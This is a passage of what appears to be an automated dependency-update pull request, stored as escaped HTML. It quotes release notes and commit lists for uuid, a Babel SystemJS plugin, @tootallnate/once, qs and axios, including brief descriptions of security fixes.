ctavan/prepare-for-esm\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/d125e45f766ce4b2732e2c287cd01ade7e3507e2\"\u003e\u003ccode\u003ed125e45\u003c/code\u003e\u003c/a\u003e test: run eslint as part of the tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/acd26d6ae87bf18ce7b75a6f4d6ae5d194b4c7ca\"\u003e\u003ccode\u003eacd26d6\u003c/code\u003e\u003c/a\u003e test: remove unused randomFillSync variable\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/b22219f6969a9f0a313820c62b6a4e09acad24d5\"\u003e\u003ccode\u003eb22219f\u003c/code\u003e\u003c/a\u003e chore: define global msCrypto to satisfy eslint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0c4638b953bab0668d83f69d681e910ef795b98d\"\u003e\u003ccode\u003e0c4638b\u003c/code\u003e\u003c/a\u003e style: convert tabs to spaces\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/uuidjs/uuid/compare/v3.3.2...v3.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.25.9 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@tootallnate/once` from 2.0.0 to 2.0.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TooTallNate/once/releases\"\u003e@​tootallnate/once's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea1e5e2d: Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TooTallNate/once/blob/v2.0.1/CHANGELOG.md\"\u003e@​tootallnate/once's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea1e5e2d: Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/bcbb21d387e5fb2d0bf8ec2fd8d0ac97d4553241\"\u003e\u003ccode\u003ebcbb21d\u003c/code\u003e\u003c/a\u003e ci: fix OIDC publishing — Node 24, npm latest, provenance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/dc24387be8e3405f1e7c911caf76c87b72a0e145\"\u003e\u003ccode\u003edc24387\u003c/code\u003e\u003c/a\u003e Version Packages (2.x) (\u003ca href=\"https://redirect.github.com/TooTallNate/once/issues/12\"\u003e#12\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/b8a6f80afcfd2482b4bdb1e29d784340a05e0ce3\"\u003e\u003ccode\u003eb8a6f80\u003c/code\u003e\u003c/a\u003e CI: test all Node versions on Linux only\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/dabcc0fb6202663cd83994f0a21ea1c710395327\"\u003e\u003ccode\u003edabcc0f\u003c/code\u003e\u003c/a\u003e ci: drop EOL Node.js 14.x/16.x, add 22.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/b464efcf4238d92590245b4d211d2fc05a94d28a\"\u003e\u003ccode\u003eb464efc\u003c/code\u003e\u003c/a\u003e Update CI: modern Node versions, fix macOS ARM64 compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/a1e5e2d784bcd1c65e49fac1524c6c94fe81f871\"\u003e\u003ccode\u003ea1e5e2d\u003c/code\u003e\u003c/a\u003e Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/TooTallNate/once/compare/2.0.0...v2.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​tootallnate/once\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.14.0 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.14.0...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 1.7.4 to 1.16.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.1 — May 13, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a defence-in-depth fix for prototype pollution in \u003ccode\u003eformDataToJSON\u003c/code\u003e, hardens proxy and CI workflows, restores Webpack 4 compatibility for the fetch adapter, and includes several small bug fixes and maintenance improvements.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Defence-in-Depth:\u003c/strong\u003e Hardened \u003ccode\u003eformDataToJSON\u003c/code\u003e against already-polluted \u003ccode\u003eObject.prototype\u003c/code\u003e by walking own properties only, so attacker-controlled keys inherited from a poisoned prototype cannot propagate through deserialization. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Cleartext Leak:\u003c/strong\u003e Fixed an issue where HTTPS request data could be transmitted in cleartext to an HTTP proxy under certain configurations. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10858\"\u003e#10858\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCI Cache Removal:\u003c/strong\u003e Removed all GitHub Actions caches as a defence-in-depth measure against cache poisoning vectors in the build pipeline. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10882\"\u003e#10882\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eData URI Parsing:\u003c/strong\u003e Updated the \u003ccode\u003efromDataURI\u003c/code\u003e regex to match RFC 2397 more strictly, fixing edge cases in \u003ccode\u003edata:\u003c/code\u003e URL handling. (\u003cstrong\u003e\u003ca 